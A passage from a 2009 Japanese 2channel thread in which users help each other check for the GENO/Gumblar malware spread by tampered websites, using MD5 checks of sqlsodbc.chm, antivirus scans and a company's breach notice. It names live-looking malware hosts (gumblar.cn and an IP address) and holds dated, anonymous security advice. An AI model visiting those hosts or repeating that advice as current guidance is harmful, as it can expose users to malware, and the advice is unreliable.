トロイの木馬やコンピュータウイルスなどの混入を防ぐことが出来る。 しかしながら、この場合MD5値は手元で計算できるのだから、
改竄済みのファイルのMD5値が同梱されている可能性がある。従って、改竄の恐れがある場合には、
ファイルに同封されているMD5値と比較するのではなく、MD5値だけは何かしら信頼できる方法で配布者から入手する必要がある。


118 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:49:00 ]
FreeBSDはインストール可能なCDイメージと、それのMD5値を同時に配布している。
(MD5値の改変はないと仮定して)インストール可能なCDイメージが、途中で改変されていないことを確認してみる。
配布サイトから、ここでは 5.1-RELEASE-i386-miniinst.iso という最小構成のインストールイメージファイルと、
CHECKSUM.MD5 というMD5値(いわゆるMD5チェックサム)の書かれたテキストファイルをダウンロードする。
md5 コマンドを、イメージファイルに実行する。
localhost% md5 5.1-RELEASE-i386-miniinst.iso
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67
CHECKSUM.MD5の中身を確認し、一致していれば破損の可能性は低いことが分かる。
localhost% cat CHECKSUM.MD5
MD5 (5.1-RELEASE-i386-disc1.iso) = 3b6619cffb5f96e1acfa578badae372f
MD5 (5.1-RELEASE-i386-disc2.iso) = 2cfa746974210d68e96ee620bf842fb6
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67


119 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:49:32 ]
>>112
なにこいつw

120 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:50:06 ]
ブログやなんかで記事書いてもたいして読まれて無いし意味無いかな〜



121 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:51:09 ]

           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   同人サイトなんてどうでもいいんだよ!!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /


122 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:51:38 ]
そういやGW始まったばかりの頃にすげー重くなって
こりゃいかんとリカバリしたことあった
すごく軽くなって満足してたが今思えばウイルスに感染してたのか…

123 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:53:31 ]
>>121
社員さんいいかげんにしてくださいよ

124 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:53:55 ]
>>115
ありがとう
HASH CHECKER入れてみます
ネットつなげるの少し怖いなw

125 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:54:09 ]
メインストリーム落ちしたOS使ってないと感染しないのにすごい盛り上がりっぷりだな

126 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:54:40 ]
>>125
メインストリーム落ちしたOSって?

127 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:54:45 ]
>>124
www.vector.co.jp/soft/winnt/util/se297267.html

128 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:55:26 ]
NTTコミュニケーションズさん
 120.29.185.234(VPS-TOKYO2)
今日も踏んでみたけど放置のままなんだなあ・・・

129 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:55:46 ]
>>116
Wikipediaの説明読んでも、全く理解できないんだが・・・
結局、MD5がGENOウイルスとどう関係しているの?

130 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:57:22 ]
>>128
これってどんなサイト?



131 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:58:01 ]
>>120
今日はすごいヒット数になるかもよ
まだ分かってないやつ多いと思う

132 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:58:12 ]
>>124
少し怖い(セキュリティ的に)と思ったなら今後対策を常に講じれば良いだけです。
それに気がついただけでも良いことだと思いますよ。

133 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:58:15 ]
小林製薬のページは今でも感染ばら撒いてる最中なの?
もう改善されて感染されちゃったよっていう伝達がされてるの?

134 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:59:32 ]
>>133
メルマガより


いつも「暮らしのヒントお知らせ隊」メールマガジンをご愛読いただき
誠にありがとうございます。

この度、弊社サイトの一部(「暮らしのヒントお知らせ隊」含む)に
おいて第三者による改ざんが確認され、当該期間に下記サイトを閲覧
された方にウイルス感染の恐れがあることが判明いたしました。

■閲覧により感染した可能性のある期間
 5月10日(日)20時23分 〜 5月11日(月)21時27分

■改ざんされたサイト
 ・暮らしのヒントお知らせ隊
 ・ハナノア ブランドサイト
 ・イージーファイバー ブランドサイト

上記期間に当該サイトにアクセスされた皆様におかれましては、誠に
お手数ではございますが、下記URLにて対応をご確認下さい。

www.kobayashi.co.jp/info/090512.html

平素から弊社サイトをご覧いただいている皆様にご迷惑をおかけしま
したこと、心よりお詫び申し上げます。
引き続きサイトの安全管理には万全を尽くしてまいりますので、今後とも
よろしくお願い申し上げます。



135 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:00:50 ]
>>130
表示されないので謎

136 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:02:35 ]
UAC切ってたvistaってやばいよね…?

137 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:03:34 ]
>>134
ありがとう
対応されてるみたいだな
っつーか一応有名企業なのに誰か報道してくれんのか

138 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:04:17 ]
>>129
意味がわからなければ半年romれ

139 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:05:14 ]
>>138
ROMったらウィルス感染しちゃうわ

140 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:05:17 ]
感染してる人ってしてない人より楽観的だよね



141 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:05:30 ]
だから感染するんだよな

142 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:05:32 ]
前スレ816
 816 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2009/05/16(土) 03:13:52
 >>806 ぐぐったらこんなんでました
 ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1020068155


あれ?リンク先・・・日付が・・・
それとこの一文

>ブラウザの一時ファイルを削除することで、ウイルスが駆除できるでしょう。

まさかgenoはこれを見て・・・

143 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:07:13 ]
>>135
ていうかNTTのくせになにやってるんだろうね

144 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:08:20 ]
>>142
GENOってパソコン関係のショップなんでしょ?
ありえない…

145 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:08:37 ]
>>138
ROMっているだけで感染するんだが

146 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:08:49 ]
>>139
テンプレをちゃんと見ればわかるだろ
わからなければわからない自分を呪え

147 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:09:55 ]
危険なIPをルーターで全部フィルタリングした
一括登録できないからマジ疲れた…寝る

148 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:10:09 ]
sqlsodbc.chm ってXPだけのファイル?

149 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:10:17 ]
わからないなら違う方法で確認すりゃいいのに

150 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:11:10 ]
>>41
確認しようとぐぐったけど さっぱりわからんかったw



151 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:11:41 ]
>>129
MD5は該当ファイルの中身を関数で計算し値を出力する。
同じファイルで計算すると同じ値になる。

*現状の*では既存ファイルの中身を書き換える。
だからMD5の値を比較すれば書きらえたかどうかが分かる。

152 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:11:55 ]
改めてJavascript切ることの重要性がわかったわ
でも最近の公式サイトとかはJavascript、Flash使いまくりだからな〜
めんどうなんでほとんどWikipediaで済ましてるわ

153 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:12:44 ]
>>152
なんであんなにフラッシュ使うんだろうね

154 名前:94 mailto:sage [2009/05/16(土) 07:13:05 ]
>>129
今のところ、感染したPCのファイルの一部が ウィルス作者に都合がいいように書き換えられるんだけど、
そんな違いが初心者にわかるわけないだろ?

もっと簡単に、
君のPCが、ウィルスに感染していない(書き換えられていないファイル) だと判断するには、
書き換えられていない正常なファイルと比較して一致すれば良い。

だが、一致しているかを判断するのも大変そうだから、ツールを使って調べるわけ。
MD5ってのはファイルの指紋みたいなもので、
正常なファイルの指紋と 君のPCの同じ名前のファイル の指紋が一致すれば
多分感染していなそうだ・・・という推測が成り立つ(感染した全部PCのファイル書き換えるとは言い切れないため)。

反対に感染しているファイルの指紋と 一致しちゃったら、100パーセント 感染しているってこと。
その指紋を取るソフトが>>124とか>>127なわけ。


155 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:13:43 ]
みんなおはよう
ちなみに、Firefox系のブラウザでGoogle検索しただけで、感染したサイトが一番上ならGoogleの検索結果開いただけで感染する可能性あり。
Googleの先読み機能が影響してるので怖い方はabout:configからnetwork.prefetch-nextをfalseにすること推奨

156 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:13:43 ]
>>148
Windows2000以外には存在する。

157 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:15:03 ]
MD5云々は最終結論だとして、
sqlsodbcのファイルサイズを偽装したウイルスは確認されてるの?

158 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:15:04 ]
>>153
制作会社がうまーなのかな

159 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:16:02 ]
>>156
Meにも存在する?

160 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:16:30 ]
>>155
Google以外の検索サイトは先読みしないんですかね?



161 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:17:01 ]
アドバイス宜しくお願いします。

【OS】XP SP3
【使用セキュリティソフト】ウイルスバスター2009
【疑った理由】
セキュリティログを見てたらこんなログがでてた(その時間は嫁が使ってた。)
そのあとどんな処理をしたかは覚えていないらしい。

"フィッシング詐欺対策" "2009/05/08"
"時間" "URLアドレス" "偽装サイトブロック (ホスト名変換)" "脅威"
"15:55" "gumblar.cn/rss/?id=5718066" "" "このWebサイトは安全でない可能性があります。
                             このWebサイトにはスパイウェアや不正プログラムが存在しているか、
                             またはこのWebサイトは偽のWebサイトか、
                             安全性が非常に低いと評価されているWebサイトです。"
"15:56" "gumblar.cn/rss/?id=5718066" "" "このWebサイトは安全でない可能性があります。
このWebサイトにはスパイウェアや不正プログラムが存在しているか、
またはこのWebサイトは偽のWebサイトか、
安全性が非常に低いと評価されているWebサイトです。"

【症状】
今のところ自覚症状なし
【確認手段】
sqlsodbc.chmのサイズ,MD5チェック、カスペオンラインスキャン、バスターウィルススキャン
cmd.exe、regedit.exeの起動チェック、特定サイトのアクセスチェック
ttp://www3.atword.jp/gnome/を参考にレジストリチェック
【結果】
sqlsodbc.chmのサイズ、MD5共に問題なし。cmd.exe、regedit.exeの起動OK。CPU、メモリ使用率も問題なし。CPU、メモリ使用率も問題なし。
カスペオンラインスキャン何も検知せず。レジストリも問題なし。
バスターウィルススキャンスパイウェアは検知したが、全てクッキーにある奴だけ。ウィルスは検知していない。

この結果でほぼ感染していないと思ってますが、皆様の助言を頂きたく書込みしました。
その他チェック項目等がありましたらご指導ください。

162 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 07:17:35 ]
心配なら一週間回線切って寝ろ

163 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:17:49 ]
>>154
129じゃないんだが、その指紋にあたるのがバイト数ってことですか?

164 名前:94 101 154 mailto:sage [2009/05/16(土) 07:18:02 ]
つづき。
>>129
そのファイルの場所が>>7
指紋の値が>>6
だが、>>4の最後に
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
とあるので、これで大丈夫だから感染していない! とは言い切れないわけ。
あくまで黒を特定する為の手段。

165 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:18:37 ]
>>158
わざわざ重たいサイトつくって金もらうのね

166 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:19:38 ]
>>165
特にゲーム会社のHPってトップページからフラッシュで重すぎるから
リンク貼られていても飛ばないようにしているわ・・・
見れるまで1分かかるとかイライラする

167 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:19:49 ]
>>160
してないと思う

>>162
問題なし
あとhttp://のところはhXXp://とかにしろ

168 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:19:50 ]
>>164
トン
わかりやすかった

169 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:19:58 ]
Adobe Reader Speed-Upってどこで手に入るの?

170 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:20:35 ]
前スレの>>216これか・・・

111 名前:GENO[sage] 投稿日:2009/05/16(土) 00:04:18 ID:Fd0/+V3h0
バイオハザードと戦国ゲームを扱っているサイトで感染確認

数日前に行った時はAVAST!が怒るくらいで済んだが次に行ったらAVAST!が激怒
もしかしたら新種か亜種か何かにここ数日で進化したか?
怒る→警告とこのサイトの通信遮断するところクリック
激怒→ウィルスをチェスト送り推奨で今現在チェストに放り込まれてる
ただ放り込まれているのはキャッシュなので過剰反応かもしれん
因みに火狐+JSカットで隔離までいったw

とりあえず最初にいった時にウィルスの報告したんだけど対応していないソフトで
検査したらしく管理人さんは大丈夫って思っている
次にいった時はAVAST!激怒したので報告むりぽ



171 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:20:35 ]
>>161
大丈夫だとおもいます
ですが実際見ているわけじゃないので

精神的に不安ならばクリーンインスコ
大丈夫そうならそのままで

172 名前:167 mailto:sage [2009/05/16(土) 07:20:49 ]
安価ミス
×>>162
>>161

173 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:21:00 ]
エロゲー公式サイトとかは切ってても大丈夫なとこが多い

174 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:21:29 ]
>>165
取引として考える一つの指標として
命令文・タグ、がいくつ存在するかってのがある
タグ打ちよりもFlashの方が命令文が多いのならば
そっちの方が金になるってことでFlashを使うってのもあるかもしれない

175 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:22:00 ]
>>166
どんだけ遅い回線だよ

176 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:22:57 ]
WindowsMe使っているんだが、C:\WINDOWS\system32 に sqlsodbc.chm ってファイル無いんだが?

177 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:23:08 ]
金儲けに走ると悪いことが起きるってばっちゃが

178 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:23:36 ]
もうMeはお呼びじゃない
使うならオフライン専用で

179 名前:161 mailto:sage [2009/05/16(土) 07:24:08 ]
直リンすみませんでした。

>>167
ご回答有難うございます。
問題なさそうなので、安心して眠れます。

180 名前:94 101 154 mailto:sage [2009/05/16(土) 07:24:29 ]
>>163
>>164に書いたとおり、指紋の値がMD5の値。
バイト数は、指紋にはならない。
バイト数(ファイルサイズ)なんて、不要なデータを追加すれば、いくらでも変えられるじゃん。




181 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:26:50 ]
>>159
Meにはデフォルトではchmはいっていませんが、他ソフト導入や更新をすると入るようです

182 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:29:02 ]
同人のスレ見てたらwin98の人もいた・・・

183 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:30:07 ]
疎い人なら今もふらふらネットサーフィンしてるんだろな
ちょっと挙動がおかしくても気にしなかったり
なんでもOK押したりさ・・・

184 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:31:53 ]
そういう時期がわたしにもありました。

185 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:32:08 ]
挙動がおかしくても、Win98だからかな、古いPCだからかな
程度で済んでしまうのかもしれないな

186 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:32:48 ]
同人系ってPCの買い替えサイクルすっげ速そうなイメージあったのに
そうでもないのかね
Macとりなくすのユーザーがのほほんしててうらやましい・・・

187 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:34:37 ]
こんな時だけだよな「Linux使ってて良かった」って思うのは

188 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:34:40 ]
質問しに来ました
もし自分のサイトにスクリプト埋め込まれた場合、セキュリティソフトは警告出しますか?

189 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:34:54 ]
というかWin98だとウイルスきかなそうなイメージがあるんだが
古すぎて
そんな事はないんだよなあ

190 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:35:31 ]
これ結構酷いウイルスみたいだけど、ニュー速にスレないんだな



191 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:35:50 ]
同人なんて貧乏なんだから、未だに98とかMeとか使っているよ
動画サイトとかネトゲしなきゃ、普通にHPとかブログ読めるし

192 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:36:14 ]
自作板住人だったのでGENO騒動早めに知って良かった

193 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:36:21 ]
>>188
出るならこんなに広がってない

194 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:36:44 ]
>>182
98やMeだと、そもそもFlash9までしか対応してない
恐ろしや…

195 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:37:13 ]
>>188
使っているソフトによりますが、難しいでしょう。

196 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:37:30 ]
>>193
じゃあ自分で感染してるのは気づかないんですね
自分のパソコンからソース見てもみえないのかな...

197 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:37:32 ]
>>194
adobeのアクロバット・リーダーも最新バージョンは対応してないから
pdf文書とかも読めない場合がある・・・

198 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:38:22 ]
ところで、同人スレってどこのスレのこと?

199 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:39:01 ]
>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
changi.2ch.net/test/read.cgi/doujin/1242391122/

200 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 07:39:26 ]
>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
changi.2ch.net/test/read.cgi/doujin/1242391122/l50




201 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:39:55 ]
テレビはエコポイントとインフルの話題ばかり
1分でいいからウィルスの話題をたのむ

202 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:41:51 ]
ボットネットの一部となり、加害者になって、警察が来るなんて考えもしてない。
「だってわかんないんだもん」で済むと思っているだろうし・・・。
ウィルスとはよく言ったものだ。

お前らも豚の媒介者とならんように、マスクと手洗いウガイはしてくれよ。

www3.atword.jp/gnome/
記事が更新されてる。
俺がこの人だったら、イワンこっちゃない って心底思っているだろうな。
感染したサイトに警告メールを出していたみたいだけど・・・

203 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:42:31 ]
総被害額どれくらいになるんだろうか

204 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:42:34 ]
>>187
信頼できるのは余剰パーツで組んだUbuntuマシンだけだぜ…

205 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:44:03 ]
今IEでみてんだけどさ
Jane styleでみたほうが安全なんだよね。
デスクトップになぜかそのアイコンあるけど。
使ったことないんだよな。

206 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:45:21 ]
感染サイト踏みそうになってから不安でたまらない
再起動できたしハッシュも大丈夫だし
ウィルスチェックもしたけど気持ちがもやもやする
いやなウィルスだなぁ

207 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:48:26 ]
というか、違法な割れサイトとかゲームソフト違法DLサイトとか
アダルト関係のサイトじゃなくて、一般のまともなサイトを閲覧しただけで
exeファイルを実行とかしなくても感染するって、今回が初めてじゃない?


208 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:49:16 ]
・・・。

209 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:50:21 ]
前にMSのサイトが改ざんされてウイルス撒かれたのはなんてウイルスだっけか?

210 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:50:54 ]
WinnyとかShareみたいなP2P使わなければ安全だと思ってたのに・・・
まさか、実行ファイルじゃなくて、ただHP見ただけで感染するとか・・・



211 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:52:00 ]
>>207
そんな事は無い。昔からあった。
ただ今回は手法が少しだけちがった。

212 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:52:05 ]
サイト見ただけで感染するウィルスなんか
今までいくらでもあっただろ…
どんだけ油断してんだよ…

213 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:52:58 ]
カスペをダウンロードしたけどスキャンの仕方が分かりません
何度もインストールしますかと出てしまいます
ニフティも何度も使用しているパソコンの環境についての画面になってスキャンできません
何がいけないので出来たら助言お願いします

214 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:53:36 ]
ちょっと聞きにくいんだけど同人ってどういう意味?

215 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:53:50 ]
つオンラインスキャン

216 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:53:56 ]
image.itmedia.co.jp/l/im/news/articles/0905/15/l_malware.jpg
これだよな?

>>207
>>210
それは10年前の話。
今回の手口も、これまでに何度も使われてきたやり方。
5年前の記事でも読め。
itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/


217 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:54:47 ]
>>214
ja.wikipedia.org/wiki/%E5%90%8C%E4%BA%BA
同人(どうじん)とは、同じ趣味や志をもった人、仲間ないし集団のことである。

218 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:55:11 ]
>>213
カスペじゃ削除できん
avastをブート時に起動させるんだ!
やり方は知らん、勝手にavastがやった

219 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:55:51 ]
>>218
Meの場合、avastのブートタイム検査は出来ない

220 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:56:24 ]
ブートってなに?



221 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:56:43 ]
だめだこりゃ

222 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 07:56:57 ]
>>217
逆に判りづらい説明してやんなよww

223 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:57:06 ]
ところでClamwinの対応マダー

224 名前:214 mailto:sage [2009/05/16(土) 07:57:17 ]
>>217
よくわかりました どうも

225 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:57:21 ]
>>214
同じ趣味、指向性をもった人ってところか。

226 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:57:40 ]
>>220
ja.wikipedia.org/wiki/%E3%83%96%E3%83%BC%E3%83%88
ブート(またはブートストラップ、boot、bootstrap)は、コンピュータシステムの電源を入れたときに
オペレーティングシステムを起動するまでの処理の流れをいう。また、ブートローダ(boot loader)とは、ブート処理を行うソフトウェアを意味する。

少しはwikiれ

227 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:57:42 ]
>>219
更新の止まってるOSでサイトを見るのに使うなよ
まわりへ嫌がらせになるだけじゃん

228 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:58:09 ]
>>202
>ある状況によっては、MIME-sniffingとして知られたプロセスを通し、Internet Explororブラウザは
>html と同様に、この image fileを実行してしまいます。このことは、ブービートラップのように
>埋め込まれたイメージの中のスクリプトを実行してしまうことを意味しています。

…えーと、IEは画像ファイルからも感染するってこと?

229 名前:214 mailto:sage [2009/05/16(土) 07:58:29 ]
>>225
ありがとう

230 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 07:58:50 ]
>>227
だって、Meの入ったPCしか無いんだもん・・・




231 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:00:28 ]
知るかそんなの
PC買う金がないなら働くか携帯でも使ってろ

232 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:00:31 ]
>>218
自分で確認できた範囲では感染はしてないんですがスキャンできない以上怖いので
クリーンインストールしようと思います。
その後にアンチウイルスソフトが必要らしいんですが、ウイルスバスター2009では駄目ですか?
スレでバスターも挙げられてたのを見かけたんですが

233 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:01:03 ]
>>190
何度か立ったけど、300前後でいつもdat落ち
さすがノーガード戦法のメッカ

234 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:02:06 ]
>>230
こうやってボットネットが少なくならない原因になってるんですねぇ

235 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:03:07 ]
RO
       、--‐冖'⌒ ̄ ̄`ー-、
     /⌒`         三ミヽー-ヘ,_
   __,{ ;;,,             ミミ   i ´Z,
   ゝ   ''〃//,,,      ,,..`ミミ、_ノリ}j; f彡
  _)        〃///, ,;彡'rffッ、ィ彡'ノ从iノ彡
  >';;,,       ノ丿川j !川|;  :.`7ラ公 '>了
 _く彡川f゙ノ'ノノ ノ_ノノノイシノ| }.: '〈八ミ、、;.)
  ヽ.:.:.:.:.:.;=、彡/‐-ニ''_ー<、{_,ノ -一ヾ`~;.;.;)
  く .:.:.:.:.:!ハ.Yイ  ぇ'无テ,`ヽ}}}ィt于 `|ィ"~
   ):.:.:.:.:|.Y }: :!    `二´/' ; |丶ニ  ノノ
    ) :.: ト、リ: :!ヾ:、   丶 ; | ゙  イ:}    逆に考えるんだ
   { .:.: l {: : }  `    ,.__(__,}   /ノ
    ヽ !  `'゙!       ,.,,.`三'゙、,_  /´   「98やMeはPCではない」
    ,/´{  ミ l    /゙,:-…-〜、 ) |
  ,r{   \ ミ  \   `' '≡≡' " ノ       と考えるんだ
__ノ  ヽ   \  ヽ\    彡  ,イ_
      \   \ ヽ 丶.     ノ!|ヽ`ヽ、
         \   \ヽ `¨¨¨¨´/ |l ト、 `'ー-、__
            \  `'ー-、  // /:.:.}       `'ー、_
          `、\   /⌒ヽ  /!:.:.|
          `、 \ /ヽLf___ハ/  {
              ′ / ! ヽ

236 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:03:59 ]
>>231
買う金はあるよ
今、電気店へ行ったりして物色中
何を買えば良いか迷ってる

予算は7万くらいで、現在ノートPCしか持ってないので
デスクトップ型ならモニターも買わなきゃいけない
とりあえず、OSはXPにすべきかVISTAにすべきか、7にすべきか
後、プリインストールされた本体を買うべきか、別個に買って自分でインストールすべきか・・・

色々と悩むんだな


237 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:04:33 ]
>>230
朝っぱらから萌えたw

238 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:04:43 ]
>>235
PCではない……つまりMacということか!

239 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:04:49 ]
まったく初心者ですが、とりあえず何をしたら感染してるかわかります?
1読んでもよくわかりません
あと感染してたらLANで繋がったPCも全部ヤバいですかね?

240 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:05:16 ]
前からネットに接続しただけで感染するウイルスとかあったじゃん



241 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:05:29 ]
>>236
クレカ情報が抜かれるんですね判ります

242 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:05:31 ]
テンプレ全部読めよ

243 名前:214 mailto:sage [2009/05/16(土) 08:05:38 ]
>>232
だめ
ウイルスバスターはこういうのの対応遅い

244 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:06:07 ]
チラシの裏に書け


245 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:06:35 ]
>>236
8000円の中古PCで十分。

246 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:06:54 ]
>>239
PC全部窓から投げすればおk

247 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:02 ]
>>245
じゃあ、今のMeで十分だろ

248 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:04 ]
>>239
読む気も理解する気もないだろ

249 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 08:07:10 ]
クリーンインストールってメーカー製のパソコンじゃできないんですか?

